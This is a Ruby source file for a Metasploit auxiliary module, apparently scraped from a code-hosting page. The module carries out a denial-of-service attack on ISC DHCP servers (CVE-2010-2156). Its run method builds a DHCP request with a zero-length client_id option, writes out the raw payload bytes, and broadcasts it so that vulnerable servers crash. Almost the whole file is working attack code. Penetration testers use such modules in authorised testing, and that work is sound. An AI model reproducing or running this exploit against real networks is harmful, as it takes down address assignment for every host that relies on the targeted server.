78 lines
2.1 KiB
Ruby
78 lines
2.1 KiB
Ruby
##
|
|
# $Id$
|
|
##
|
|
|
|
##
|
|
# This file is part of the Metasploit Framework and may be subject to
|
|
# redistribution and commercial restrictions. Please see the Metasploit
|
|
# Framework web site for more information on licensing and terms of use.
|
|
# http://metasploit.com/framework/
|
|
##
|
|
|
|
require 'msf/core'
|
|
|
|
class Metasploit3 < Msf::Auxiliary
|
|
|
|
include Msf::Auxiliary::Dos
|
|
include Msf::Exploit::Capture
|
|
|
|
def initialize
|
|
super(
|
|
'Name' => 'ISC DHCP Zero Length ClientID Denial of Service Module',
|
|
'Description' => %q{
|
|
This module performs a Denial of Service Attack against the ISC DHCP server,
|
|
versions 4.1 before 4.1.1-P1 and 4.0 before 4.0.2-P1. It sends out a DHCP Request
|
|
message with a 0-length client_id option for an IP address on the appropriate range
|
|
for the dhcp server. When ISC DHCP Server tries to hash this value it exits
|
|
abnormally.
|
|
},
|
|
'Author' =>
|
|
[
|
|
'sid', # Original POC
|
|
'TheLightCosine <thelightcosine@gmail.com>' # msf module
|
|
],
|
|
'License' => MSF_LICENSE,
|
|
'Version' => '$Revision$',
|
|
'References' =>
|
|
[
|
|
[ 'CVE', '2010-2156' ],
|
|
[ 'OSVDB', '65246'],
|
|
[ 'URL', 'http://www.exploit-db.com/exploits/14185/']
|
|
]
|
|
)
|
|
register_options(
|
|
[
|
|
OptAddress.new('RIP', [true, 'A valid IP to request from the server'])
|
|
]
|
|
)
|
|
deregister_options('RHOST','FILTER','PCAPFILE','SNAPLEN','TIMEOUT')
|
|
end
|
|
|
|
def run
|
|
print_status("Creating DHCP Request with 0-length ClientID")
|
|
open_pcap
|
|
p = PacketFu::UDPPacket.new
|
|
p.ip_daddr = "255.255.255.255"
|
|
p.udp_sport = 68
|
|
p.udp_dport = 67
|
|
|
|
# TODO: Get a DHCP parser into PacketFu
|
|
chaddr = "\xaa\xaa\xaa\xaa\xaa\xaa"
|
|
dhcp_payload = "\x63\x82\x53\x63\x35\x01\x03\x3d\x00\xff"
|
|
p.payload = dhcp_req(chaddr,dhcp_payload)
|
|
p.recalc
|
|
print_status("Sending malformed DHCP request...")
|
|
capture_sendto(p, '255.255.255.255')
|
|
close_pcap
|
|
end
|
|
|
|
def dhcp_req(chaddr,payload)
|
|
req = "\x00" * 236
|
|
req[0,3] = "\x01\x01\x06" # Boot request on Eth with hw len of 6
|
|
req[12,4] = Rex::Socket.addr_aton(datastore['RIP'])
|
|
req[28,6] = chaddr
|
|
req + payload
|
|
end
|
|
|
|
end
|